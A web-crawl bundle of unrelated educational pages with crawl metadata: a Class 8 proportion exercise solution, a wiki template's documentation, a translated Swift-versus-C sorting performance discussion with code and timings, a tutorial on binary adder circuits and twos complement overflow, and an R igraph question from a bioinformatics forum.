{"ft_lang_label":"__label__en","ft_lang_prob":0.59239507,"math_prob":0.96868277,"size":7159,"snap":"2022-05-2022-21","text_gpt3_token_len":2634,"char_repetition_ratio":0.14772886,"word_repetition_ratio":0.024042742,"special_character_ratio":0.41095126,"punctuation_ratio":0.16179775,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911332,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-25T22:13:44Z\",\"WARC-Record-ID\":\"<urn:uuid:53f553a0-e4c1-472f-b755-167a72180f67>\",\"Content-Length\":\"40753\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2037cf10-7067-486b-a4b4-f6356e98b31c>\",\"WARC-Concurrent-To\":\"<urn:uuid:b1e60ce1-4fa4-4315-8b4d-9a9a32287c83>\",\"WARC-IP-Address\":\"162.0.227.212\",\"WARC-Target-URI\":\"https://number.academy/16966\",\"WARC-Payload-Digest\":\"sha1:NRSYO7MG636OT7VVDRY26H7ZNEU6FGPT\",\"WARC-Block-Digest\":\"sha1:GSKUTJ4JN7WWB5PTHTHIPMZU7GE2UKIK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662594414.79_warc_CC-MAIN-20220525213545-20220526003545-00252.warc.gz\"}"}
https://www.cuemath.com/ncert-solutions/q-5-exercise-13-1-direct-and-inverse-proportions-class-8-maths/
[ "In the verge of coronavirus pandemic, we are providing FREE access to our entire Online Curriculum to ensure Learning Doesn't STOP!\n\n# Ex.13.1 Q5 Direct and Inverse Proportions Solution - NCERT Maths Class 8\n\nGo back to  'Ex.13.1'\n\n## Question\n\nA photograph of a bacteria is enlarged $$50,000$$ times attains a length of $$​​5 ​​\\rm{cm}$$ as shown in the diagram. What is the actual length of the bacteria? If the photograph is enlarged $$20,000$$ times only, what would be its enlarged length?\n\nVideo Solution\nDirect And Inverse Proportions\nEx 13.1 | Question 5\n\n## Text Solution\n\nWhat is Known?\n\nBacteria enlarged $$50,000$$ times attain a length of $$5 \\,\\rm{cm.}$$\n\nWhat is Unknown?\n\nActual length of the bacteria\n\nif $$20,000$$ times enlarged what will be the length of the bacteria?\n\nReasoning:\n\nTwo numbers $$x$$ and $$y$$ are said in direct proportion if,\n\n\\begin{align}\\frac{x}{y}=k,\\quad x=y\\,k\\end{align}\n\nWhere $$k$$ is a constant.\n\nSteps:\n\n\\begin{align} \\text{Actual length,}\\ l&=\\frac{{{y}_{1}}}{{{x}_{1}}} \\\\ l&=\\frac{5}{50000} \\\\ l&=0.0001\\ \\rm{cm} \\\\ \\end{align}\n\n Number  of  times  enlarged Length attained ${{x_1} = {\\rm{50,000}}}$ ${{y_{\\rm{1}}} = {\\rm{5}}}$ ${{x_2} = {\\rm{20,000}}}$ ${{y_{\\rm{2}}} = {\\rm{?}}}$\n\nThe number of times enlarged is directly proportional to the length attained.\n\nActual length $$= 0.0001 \\,\\rm{cm}$$\n\nEnlarged length will be $$2 \\,\\rm{cm.}$$\n\nLearn from the best math teachers and top your exams\n\n• Live one on one classroom and doubt clearing\n• Practice worksheets in and after class for conceptual clarity\n• Personalized curriculum to keep up with school" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6664737,"math_prob":0.9997849,"size":1157,"snap":"2020-10-2020-16","text_gpt3_token_len":379,"char_repetition_ratio":0.15177797,"word_repetition_ratio":0.0,"special_character_ratio":0.40103716,"punctuation_ratio":0.13478261,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987008,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-07T20:52:15Z\",\"WARC-Record-ID\":\"<urn:uuid:a9acb66b-a9ae-45fc-9d89-326e8fdddabb>\",\"Content-Length\":\"105828\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:901a846a-76a9-4980-b6bd-9603b004a66d>\",\"WARC-Concurrent-To\":\"<urn:uuid:a504d9c9-0fce-4043-ab87-64691b658696>\",\"WARC-IP-Address\":\"52.74.183.11\",\"WARC-Target-URI\":\"https://www.cuemath.com/ncert-solutions/q-5-exercise-13-1-direct-and-inverse-proportions-class-8-maths/\",\"WARC-Payload-Digest\":\"sha1:HZ4JH2AKNEIRXF3WYZYVC3YT7PWIFGEJ\",\"WARC-Block-Digest\":\"sha1:QB7PVBL7CMZE4NPOLW23KVRNWU3AQ6JH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371805747.72_warc_CC-MAIN-20200407183818-20200407214318-00315.warc.gz\"}"}
https://informatiestandaarden.nictiz.nl/wiki/Sjabloon:Valid/doc
[ "# Sjabloon:Valid/doc\n\nGa naar: navigatie, zoeken\n\n## Purpose\n\nDetermines whether something is valid in a certain context. Currently only implemented for determining if a number is within the precision that Wikipedia expressions can handle.\n\n## Returns\n\ntrue if the argument is valid, false if it is not.\n\n## Examples\n\n`{{valid|number=A}}` = false (not a number)\n`{{valid|number=1234}}` = false\n`{{valid|number=+1234}}` = false\n`{{valid|number=-1234}}` = false\n`{{valid|number=(1234)}}` = false (one pair of parenthesis is allowed)\n`{{valid|number=--1234}}` = false (incorrect sign use)\n`{{valid|number=1234567890}}` = false\n`{{valid|number=12345678901234567890}}` = false (too large)\n`{{valid|number=1.234567890}}` = false\n`{{valid|number=1.2345678901234567890}}` = false (too many decimals)\n\n## Performance impact\n\nTemplate:Valid returns \"true\" for a valid, single number (2+2 gives \"false\"), and allows scientific notation (such as: -3.45E-07). The precision limit is determined live, for whichever server is formatting the page, typically allowing 14-digit precision (plus trailing zeroes), but it does not detect extreme precision problems dropping minor end-digits:\n\n• cannot reject: -10020030040050000000000000000.70, treated as -1.002003004005E+28\n\nThe template has been written with minimal markup text, and could be used 50,000-13,000 times per page, or less when all 30-digit numbers. Template:Valid is typically used at upper levels of other templates, so it is unlikely to trigger expansion-depth problems. However, it has an expansion-depth of 8 levels, and returns \"false\" if used when nested too deep inside other templates, such as at level 33 when the expansion depth limit is 40." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63470876,"math_prob":0.97486085,"size":1804,"snap":"2023-14-2023-23","text_gpt3_token_len":458,"char_repetition_ratio":0.16055556,"word_repetition_ratio":0.0,"special_character_ratio":0.30044347,"punctuation_ratio":0.12101911,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9746428,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-20T15:09:57Z\",\"WARC-Record-ID\":\"<urn:uuid:c07f6f0e-519f-473a-bfc1-602a10967d17>\",\"Content-Length\":\"20121\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4dbbd6a9-968d-4fb7-962b-2c6028adabbe>\",\"WARC-Concurrent-To\":\"<urn:uuid:15aaccb2-4277-43fe-86cc-2196ca99f9c0>\",\"WARC-IP-Address\":\"37.61.204.124\",\"WARC-Target-URI\":\"https://informatiestandaarden.nictiz.nl/wiki/Sjabloon:Valid/doc\",\"WARC-Payload-Digest\":\"sha1:QZFTJAFBBKZJ2I6RXKVTOEAIR5B2ZZTH\",\"WARC-Block-Digest\":\"sha1:SZZ7RHJ7ZXE5WBJNF63GVRFPPLFC5AJW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943484.34_warc_CC-MAIN-20230320144934-20230320174934-00479.warc.gz\"}"}
https://includestdio.com/935.html
[ "# Swift的性能:排序数组\n\n``````let n = 1000000\nvar x = [Int](repeating: 0, count: n)\nfor i in 0..<n {\nx[i] = random()\n}\n// start clock here\nlet y = sort(x)\n// stop clock here``````\n\n``xcrun swift -O3 -sdk `xcrun --show-sdk-path --sdk macosx```\n\n``xcrun swift -O0 -sdk `xcrun --show-sdk-path --sdk macosx```\n\n``````let n = 10000000\nprint(n*n*n*n*n)\nlet x = [Int](repeating: 10, count: n)\nprint(x[n])``````\n\n``````for i in 0..<n {\nx[i] = x[i] ^ 12345678\n}``````\n\n(这里的异或操作只是为了让我能够更容易地找到汇编代码中的相关循环,我试图选择一个易于识别的操作,但也是“无害”的,因为它不需要任何相关的检查到整数溢出。)\n\n• 随着`-Ofast`我得到我所期望的几乎。相关部分是一个包含5个机器语言指令的循环。\n• 随着`-O3`我得到的东西,出乎我的想象。内循环跨越88行汇编代码。我没有试图理解所有这些,但最可疑的部分是13个“callq _swift_retain”的调用和另外13个“callq _swift_release”的调用。也就是说,在内部循环中调用26个子程序\n\n``````let n = 10000\nvar x = [Int](repeating: 1, count: n)\nfor i in 0..<n {\nfor j in 0..<n {\nx[i] = x[j]\n}\n}``````\n\n• C ++ -O3:0.05秒\n• C ++ -O0:0.4 s\n• Java:0.2秒\n• Python与PyPy:0.5秒\n• Python:12秒\n• 快速-0.05秒\n• Swift -O3:23 s\n• Swift -O0:443 s\n\n(如果您担心编译器可能会完全优化无意义的循环,则可以将其更改为例如`x[i] ^= x[j]`,并添加一个输出的打印语句,`x`但这不会改变任何内容;时间点将非常相似。\n\n• 铛++ -O3:0.06秒\n• swiftc – 快:0.1秒\n• swiftc -O:0.1秒\n• swiftc:4秒\n\n• 铛++ -O3:0.06秒\n• swiftc – 快:0.3秒\n• swiftc -O:0.4 s\n• swiftc:540秒\n\ntl;通过使用默认版本优化级别[-O]的这个基准测试,Swift现在与C一样快。\n\n``````func quicksort_swift(inout a:CInt[], start:Int, end:Int) {\nif (end - start < 2){\nreturn\n}\nvar p = a[start + (end - start)/2]\nvar l = start\nvar r = end - 1\nwhile (l <= r){\nif (a[l] < p){\nl += 1\ncontinue\n}\nif (a[r] > p){\nr -= 1\ncontinue\n}\nvar t = a[l]\na[l] = a[r]\na[r] = t\nl += 1\nr -= 1\n}\nquicksort_swift(&a, start, r + 1)\nquicksort_swift(&a, r + 1, end)\n}``````\n\n``````void quicksort_c(int *a, int n) {\nif (n < 2)\nreturn;\nint p = a[n / 2];\nint *l = a;\nint *r = a + n - 1;\nwhile (l <= r) {\nif (*l < p) {\nl++;\ncontinue;\n}\nif (*r > p) {\nr--;\ncontinue;\n}\nint t = *l;\n*l++ = *r;\n*r-- = t;\n}\nquicksort_c(a, r - a + 1);\nquicksort_c(l, a + n - l);\n}``````\n\n``````var a_swift:CInt[] = [0,5,2,8,1234,-1,2]\nvar a_c:CInt[] = [0,5,2,8,1234,-1,2]\n\nquicksort_swift(&a_swift, 0, a_swift.count)\nquicksort_c(&a_c, CInt(a_c.count))\n\n// [-1, 0, 2, 2, 5, 8, 1234]\n// [-1, 0, 2, 2, 5, 8, 1234]``````\n\n``````var x_swift = CInt[](count: n, repeatedValue: 0)\nvar x_c = CInt[](count: n, repeatedValue: 0)\nfor var i = 0; i < n; ++i {\nx_swift[i] = CInt(random())\nx_c[i] = CInt(random())\n}\n\nlet swift_start:UInt64 = mach_absolute_time();\nquicksort_swift(&x_swift, 0, x_swift.count)\nlet swift_stop:UInt64 = mach_absolute_time();\n\nlet c_start:UInt64 = mach_absolute_time();\nquicksort_c(&x_c, CInt(x_c.count))\nlet c_stop:UInt64 = mach_absolute_time();``````\n\n``````static const uint64_t NANOS_PER_USEC = 1000ULL;\nstatic const uint64_t NANOS_PER_MSEC = 1000ULL * NANOS_PER_USEC;\nstatic const uint64_t NANOS_PER_SEC = 1000ULL * NANOS_PER_MSEC;\n\nmach_timebase_info_data_t timebase_info;\n\nuint64_t abs_to_nanos(uint64_t abs) {\nif ( timebase_info.denom == 0 ) {\n(void)mach_timebase_info(&timebase_info);\n}\nreturn abs * timebase_info.numer / timebase_info.denom;\n}\n\ndouble abs_to_seconds(uint64_t abs) {\nreturn abs_to_nanos(abs) / (double)NANOS_PER_SEC;\n}``````\n\n``````[-Onone] no optimizations, the default for debug.\n[-O] perform optimizations, the default for release.\n[-Ofast] perform optimizations and disable runtime overflow checks and runtime type checks.``````\n\nn = 10_000时[-Onone]秒数\n\n``````Swift: 0.895296452\nC: 0.001223848``````\n\n``Swift_builtin: 0.77865783``\n\n``````Swift: 0.045478346\nC: 0.000784666\nSwift_builtin: 0.032513488``````\n\n``````Swift: 0.000706745\nC: 0.000742374\nSwift_builtin: 0.000603576``````\n\n``````Swift: 0.107111846\nC: 0.114957179\nSwift_sort: 0.092688548``````\n\n``````Swift: 142.659763258\nC: 0.162065333\nSwift_sort: 114.095478272``````\n\nLLVM中提供了一个新的优化级别-Ofast,可以进行积极的优化。-Ofast放松了一些保守的限制,主要是为了浮点操作,对于大多数代码来说都是安全的。它可以从编译器中获得显着的高性能。\n\nBETA 3更新:\n\nn = 10_000[-O]\n\n``````Swift: 0.019697268\nC: 0.000718064\nSwift_sort: 0.002094721``````\n\n[-Onone]\n\n``````Swift: 0.678056695\nC: 0.000973914``````\n\n[-O]\n\n``````Swift: 0.001158492\nC: 0.001192406``````\n\n[-Ounchecked]\n\n``````Swift: 0.000827764\nC: 0.001078914``````\n\nTL; DR:是的,只有雨燕语言的实现是缓慢的,现在。如果你需要快速,数字(和其他类型的代码,大概是)代码,只需要与另一个代码。将来,你应该重新评估你的选择。尽管如此,对于大多数应用程序代码来说,它可能已经足够了。\n\n``````", null, "", null, "``````\n\n`-O3`得到我们一堆,`swift_retain`然后`swift_release`打电话,说实话,看起来他们不应该在这个例子。优化器应该已经消除了(大部分)AFAICT,因为它知道大部分有关数组的信息,并且知道它至少有一个强烈的引用。\n\n``````import Cocoa\n\nlet swift_start = NSDate.timeIntervalSinceReferenceDate();\nlet n: Int = 10000\nlet x = Int[](count: n, repeatedValue: 1)\nfor i in 0..n {\nfor j in 0..n {\nlet tmp: Int = x[j]\nx[i] = tmp\n}\n}\nlet y: Int[] = sort(x)\nlet swift_stop = NSDate.timeIntervalSinceReferenceDate();\n\nprintln(\"\\(swift_stop - swift_start)s\")``````\n\nPS:我不是Objective-C的专家,也不是来自Cocoa,Objective-C或Swift运行时的所有设备。我也可能会假设一些我没有写的东西。\n\n`` ``" ]
[ null, "https://includestdio.com/wp-content/uploads/2018/02/ujaJ4aA.png", null, "https://includestdio.com/wp-content/uploads/2018/02/t0s6DsZ.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7657066,"math_prob":0.99669856,"size":6465,"snap":"2020-24-2020-29","text_gpt3_token_len":3994,"char_repetition_ratio":0.09688903,"word_repetition_ratio":0.038404725,"special_character_ratio":0.3512761,"punctuation_ratio":0.17576317,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9914652,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T20:53:08Z\",\"WARC-Record-ID\":\"<urn:uuid:6b484eb1-e6c7-4898-ad78-2f79a362c607>\",\"Content-Length\":\"72011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b2e4eaf3-1a97-4ac0-92b5-859a4e7e89e3>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d7f3902-adb9-4049-9de7-42de58f416b4>\",\"WARC-IP-Address\":\"101.132.107.155\",\"WARC-Target-URI\":\"https://includestdio.com/935.html\",\"WARC-Payload-Digest\":\"sha1:PVEEQVILXQJFETWZTZ5SWBLQBGTP4UKO\",\"WARC-Block-Digest\":\"sha1:CDVZZZRM443W5QLGIKP5TUS7PF7ARLDX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655937797.57_warc_CC-MAIN-20200711192914-20200711222914-00297.warc.gz\"}"}
https://learnabout-electronics.org/Digital/dig41.php
[ "# Binary Arithmetic Circuits\n\n• After studying this section, you should be able to:\n• Understand the operation of Binary Adder Circuits.\n• • 4 Bit Parallel Adders.\n• • Twos Complement Overflow.\n• Use Free Software to Simulate Logic Circuit operation.", null, "### Fig 4.1.1 The Half Adder", null, "", null, "### Fig 4.1.1 The Half Adder\n\nBinary arithmetic is carried out by combinational logic circuits, the simplest of which is the half adder, shown in Fig. 4.1.1. This circuit consists, in its most basic form of two gates, an XOR gate that produces a logic 1 output whenever A is 1 and B is 0, or when B is 1 and A is 0. The AND gate produces a logic 1 at the carry output when both A and B are 1. The half adder truth table is shown in Table 4.1.1 and describes the result of binary addition.", null, "### Fig. 4.1.2 The Full Adder Circuit.\n\n1 plus 0 = 12 (110)\n\nand\n\n1 plus 1 = 102 (210)\n\nThe half adder is fine for adding two 1-bit numbers together, but for binary numbers containing several bits, a carry may be produced at some time (as a result of adding 1 and 1) that must be added to the next column. As the half adder has only two inputs it cannot add in a carry bit from a previous column, so it is not practical for anything other than 1-bit additions.", null, "When 2 or more bits are to be added, the circuit used is the Full Adder, shown in Fig 4.1.2, (blue background) together with its simplified block diagram symbol. This circuit simply comprises two half adders, the sum of A and B from the first half adder is used as input A on the second half adder, which now produces a sum of the first half adder sum (S1) plus any ‘carry in’ from the CIN terminal. Any carries produced by the two half adders are then ‘ORed’ together to produce a single COUT. output. The truth table for the circuit is given in Table 4.1.2.", null, "### Fig. 4.1.3 4−Bit Parallel Adder.", null, "Even the full adder is only adding two single bit binary numbers, but full adders may be combined to form parallel adders, which will add two multi−bit numbers. Parallel adders can be built in several forms to add multi−bit binary numbers, each bit of the parallel adder using a single full adder circuit. As parallel adder circuits would look quite complex if drawn showing all the individual gates, it is common to replace the full adder schematic diagram with a simplified block diagram version.\n\nFig 4.1.3 illustrates how a number of full adders can be combined to make a parallel adder, also called a ‘Ripple Carry Adder’ because of the way that any carry appearing at the carry in input (CIN) or produced when adding any of the 4-bit inputs, ‘ripples’ along the adder stages until a final carry out appears at the carry out output (COUT) of the final full adder for bit A3+B3.", null, "### Fig. 4.1.4 8−Bit Twos Complement Adder/Subtractor.", null, "## 8 Bit Twos Complement Adder/Subtractor\n\nTo carry out arithmetic however, it is also necessary to be able to subtract. A further development of the parallel adder is shown in Fig.4.1.4. This is an 8-bit parallel adder/subtractor. This circuit adds in the same way as the adder in Fig. 4.1.3 but subtracts using the twos complement method described in Digital Electronics Module 1.5 (Ones and Twos Complement).\n\nWhen subtraction is required, the control input is set to logic 1, which causes the bit at any particular B input to be complemented by an XOR gate before being fed to input B of the full adder circuit.\n\nTwos complement subtraction in an 8-bit adder/subtractor requires that the 8-bit number at input B is complemented (inverted) and has 1 added to it, before being added to the 8-bit number at input A. The result of this will be an 8-bit number in twos complement format, i.e. with its value represented by the lower 7 bits (bit 0 to bit 6) and the sign represented by the most significant bit (bit 7). The logic 1 on the control input is therefore also fed to the first carry input of the adder to be included in the addition, which for subtraction is therefore:\n\nInput A + Input B + 1\n\n(Here + signifies addition rather than OR)\n\nAlternatively, if addition of A and B is required, then the control input is at logic 0 and number B is fed to the adder without complementing.", null, "### Fig. 4.1.5 XOR Gate Used as a Data Selector.\n\nHow an XOR gate is used here to change the adder into a subtractor by inverting the B inputs can be seen from the truth table for an XOR gate, shown in Table 4.1.3 (in Fig. 4.1.5). Notice that if input A, (used as the CONTROL input) of the XOR gate is at logic 0, then the XOR gate selects input B, but if input A is logic 1, then it selects the inverse of input B (i.e.B).\n\n## Twos Complement Overflow\n\nThe 8-bit adder/subtractor illustrated in Fig. 4.1.4 is designed to add or subtract 8−bit binary numbers using twos complement notation. In this system the most significant bit (bit 7) is not used as part of the number’s value, it is used to indicate the sign of the number (0 = positive and 1 = negative).\n\nNo matter what the word size of a digital system (8-bits 16-bits 32-bits etc.), a given number of bits can only process numbers up to a maximum value that can be held in its designed word length.\n\nDuring arithmetical operations it is possible that adding two numbers (with either positive or negative values) that are both within the system’s limit, can produce a result that is too large for the system’s word length to hold.\n\nFor example, in a twos complement adder such as shown in Fig. 4.1.4, when adding either positive or negative 7-bit values, the result could be larger than 7 bits can accommodate. Therefore the result will need to occupy one extra bit, which means that the calculated value will ‘overflow’ into bit eight, losing a major part (12810) of the value and changing the sign of the result.\n\nTo overcome this problem, it is necessary first to detect that an overflow problem has occurred, and then to solve it either by using additional circuits or, in computing, by implementing a corrective routine in software.\n\nFortunately there is a quite simple method for detecting when an overflow occurs. As shown in Fig. 4.1.5 the overflow detection system consists of a single exclusive or (XOR) gate that takes its inputs from the carry in and carry out connections of the bit 7 (sign bit) adder.\n\nWhen the carry in (CIN) and carry out (COUT) bits of this adder are examined, it can be seen that if an overflow has occurred CIN and COUT will be different, but if no overflow has occurred they will be identical.", null, "### Adding Two Positive (In Range) Numbers\n\nTable 4.1.4 shows the effect of adding two positive values where the sum is within the range that can be held in 7 bits (≤12710). The result of adding two positive numbers has produced a correct positive result with no carry and no overflow.", null, "### Twos Complement Subtraction\n\nTable 4.1.5 shows a twos complement subtraction performed by adding a negative number to a positive number. The result is 3110 (within the range 0 to +12710), the sign bit is 0 indicating positive result, CIN and COUT are both 1, so no overflow is detected and the carry bit will be discarded.", null, "### Adding Twos Complement Negative Numbers\n\nTable 4.1.6 shows the effect of adding two negative values where the sum is less than +12710 therefore a correct negative result of −7310 (in twos complement notation) has been obtained. Both CIN and COUT are logic 1 and no overflow will be signalled. As only 8−bit calculations are being considered, the carry will be discarded.", null, "### Out of Range Result Causes Overflow\n\nWhen the addition of two positive numbers shown in Table. 4.1.7 results in a sum greater than +12710 the sign bit is changed from 0 to 1, incorrectly signifying a negative result. As the ‘carry in’ from bit 6 to bit 7 is 1 and the ‘carry out’ from bit 7 into the Carry bit is 0 an overflow is detected indicating an incorrect answer.\n\nNotice that if the result of 100111012 were to be considered as an unsigned binary value, the addition in Table 4.1.7 would be correct (15710). However as the calculation is using twos complement notation, the answer of −9910 must be considered as wrong.", null, "### Out of Range Addition of Negative Values\n\nTable 4.1.8 shows that adding two negative values can also produce a change in sign and a wrong twos complement result if it is greater than −12810. In this case adding −6310 and −7310 should have produced a negative result of −13610 and not +12010. To check this, the correct answer (although still with the wrong sign) could be obtained if, noting that an overflow had occurred, the answer was complemented and 1 added, giving an unsigned binary result of 100010002 which converts to 128 + 8 = 13610. Overflow errors can be corrected, but this would require either some additional electronics or a software action in response to the overflow signal.\n\nThe adders described in this module are generally called Ripple Carry Adders because of the way that the carry bit is propagated from one stage of the adder to the next, rippling through the chain of full adders until the carry out is produced at the carry out pin of the final stage.\n\nThis process takes some time, which is proportional to the number of bits added. Although this may be a minor problem in small adders, with an increase in the number of bits in the binary words to be added, the time delay before the final carry out is produced becomes unacceptable.\n\nTo overcome this problem, IC manufacturers offer a range of ‘Carry Look Ahead Adders’ in which the addition and carry out are produced simultaneously. The system uses complex combinational logic to assess whether, at each individual adder a carry will be produced, based on the state of the A and B inputs to that stage, and the logic state of the carry in bit to the first stage.", null, "Fig. 4.1.7 shows an arrangement for producing a carry out by splitting the full adder into a partial full adder (grey block), which has two additional outputs, a propagate (P) output that takes a logic 1 output whenever inputs A and B are 1,0 or 0,1 and a generate (G) output that will be logic 1 whenever the A and B inputs are at 1,1. Using this information it is possible to decide on the logic state of the carry out depending on a combination of the CIN state and the A and B states.\n\nIn the carry generator (blue block), the P input is ANDed with the CIN and ORed with the G input to produce a carry out. The carry out is fed to the successive adders in the normal way, but the CIN P and G signals are fed in parallel to the other adder stages, where the state of the carry out for each adder stage can be ascertained from the shared CIN signal and the A and B states for the successive stages, depending on the input states at each stage, rather than waiting for the calculations to complete at all the stages.", null, "", null, "" ]
[ null, "https://learnabout-electronics.org/Digital/images/half-adder.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/half-adder.gif", null, "https://learnabout-electronics.org/Digital/images/adder-full.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-2.gif", null, "https://learnabout-electronics.org/Digital/images/adder-4-bit-parallel.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/add-sub-8-bit.gif", null, "https://learnabout-electronics.org/Digital/images/sim-icon.jpg", null, "https://learnabout-electronics.org/Digital/images/table-4-1-3.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-4.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-5.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-6.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-7.gif", null, "https://learnabout-electronics.org/Digital/images/table-4-1-8.gif", null, "https://learnabout-electronics.org/Digital/images/adder-CLA.gif", null, "https://learnabout-electronics.org/Digital/images/CLA-block.gif", null, "https://learnabout-electronics.org/Digital/images/M14008B.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91859263,"math_prob":0.9621734,"size":11553,"snap":"2021-31-2021-39","text_gpt3_token_len":2813,"char_repetition_ratio":0.1436488,"word_repetition_ratio":0.015230843,"special_character_ratio":0.23881243,"punctuation_ratio":0.09620991,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99527705,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,6,null,null,null,6,null,3,null,3,null,3,null,null,null,3,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T17:24:14Z\",\"WARC-Record-ID\":\"<urn:uuid:c5edefe4-ed4a-4614-a17b-307b172dcbf3>\",\"Content-Length\":\"28665\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b42649ae-6832-48d7-b239-424512132c0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:0abcaefa-b3fd-4f77-b18e-edb1cbd1d5aa>\",\"WARC-IP-Address\":\"217.160.0.248\",\"WARC-Target-URI\":\"https://learnabout-electronics.org/Digital/dig41.php\",\"WARC-Payload-Digest\":\"sha1:A3VMBXDP3EYV3VQQ6OUKVRRSNS3MOIZJ\",\"WARC-Block-Digest\":\"sha1:UWZJKT7QG5O6JT4OQPQ5O4OROIMOOVT5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150307.84_warc_CC-MAIN-20210724160723-20210724190723-00204.warc.gz\"}"}
https://www.biostars.org/p/191500/
[ "Question: taking intersection between two networks\n1\nA3.7k wrote:\n\nhi,\n\nI have two networks, i took intersection between them but i cant getting edge list from data.frame\n\nwho know the reason of the error please?\n\nlibrary(igraph)\n\nAT1G01060 AT1G01170 AT1G01260 AT1G01380\n\nAT1G01060 0.0000000 0.6397474 0.0000000 2.6052533\n\nAT1G01170 0.6397474 0.0000000 0.2676777 0.0000000\n\nAT1G01260 0.0000000 0.2676777 0.0000000 0.5220432\n\nAT1G01380 2.6052533 0.0000000 0.5220432 0.0000000\n\nAT1G01490 2.5364855 2.5912206 1.6262291 0.6899495\n\nAT1G01500 0.6131010 0.0000000 0.0000000 1.7374863\n\ndim(clr)\n\n 2857 2857\n\nclr <- as.matrix(clr)\n\nAT1G01060 AT1G01170 AT1G01260 AT1G01380\n\nAT1G01060 0.000000e+00 3.397888e-04 5.573000e-04 8.577027e-05\n\nAT1G01170 2.161158e-03 0.000000e+00 3.510125e-04 3.373863e-06\n\nAT1G01260 4.630123e-07 1.294916e-05 0.000000e+00 9.821657e-05\n\nAT1G01380 2.172965e-05 1.112968e-04 2.950147e-04 0.000000e+00\n\nAT1G01490 1.987599e-03 7.534076e-06 1.634816e-06 3.346604e-05\n\nAT1G01500 8.453009e-05 4.127081e-05 1.531739e-05 7.116557e-05\n\ndim(GENEI3)\n\n 2857 2857\n\ng_sim <- graph.intersection(g_1, g_2, byname = \"auto\", keep.all.vertices = FALSE)\n\nedge_ara <- get.data.frame(g,what = \"edges\")\n\nedge_ara<- edge_ara[order(abs(edge_ara\\$weight),decreasing = T),]\n\nError in abs(edge_ara\\$weight) : non-numeric argument to mathematical function\n\nthank you\n\nR software error • 1.2k views\nwritten 4.0 years ago by A3.7k\n1\n\nHI, I would suggest you to print out the `edge_ara\\$weight` to text file and check whether you find any suspicious non-numeric argument. if there is any, just remove them and run the script.\n\n1\n\nthank you I inspect edge_ara <- get.data.frame(g,what = \"edges\") but file was empty then edge_ara<- edge_ara[order(abs(edge_ara\\$weight),decreasing = T),] gives me error but i don't know why file was empty\n\n2\n\nJust go step by step and check whether the data is there in a variable before you go for subsequent analysis\n\n1\n\nYou need to check values of g_1, g_2 and g_sim and first see what is the overlap !" ]
[ null ]
